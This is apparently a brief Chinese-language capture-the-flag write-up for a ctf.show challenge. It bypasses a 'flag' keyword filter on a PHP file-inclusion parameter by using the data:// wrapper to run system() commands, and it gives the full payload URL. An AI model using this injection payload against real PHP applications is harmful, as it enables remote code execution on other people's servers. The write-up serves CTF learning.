首先查看源代码
代码的意思是文件包含获取到的变量c的值,但是对变量c又有过滤,要求获取到的c中不包含flag
这个地方可以用data协议rce
data协议: text/plain,<?php system(‘命令’);?>
构造payload :
http://1332de51-f763-40f4-b931-c2ffaac051e5.challenge.ctf.show:8080/?c=data:text/plain,<?php system('ls');?>
查看当前目录
在可以rce和有回显之后,system执行查看flag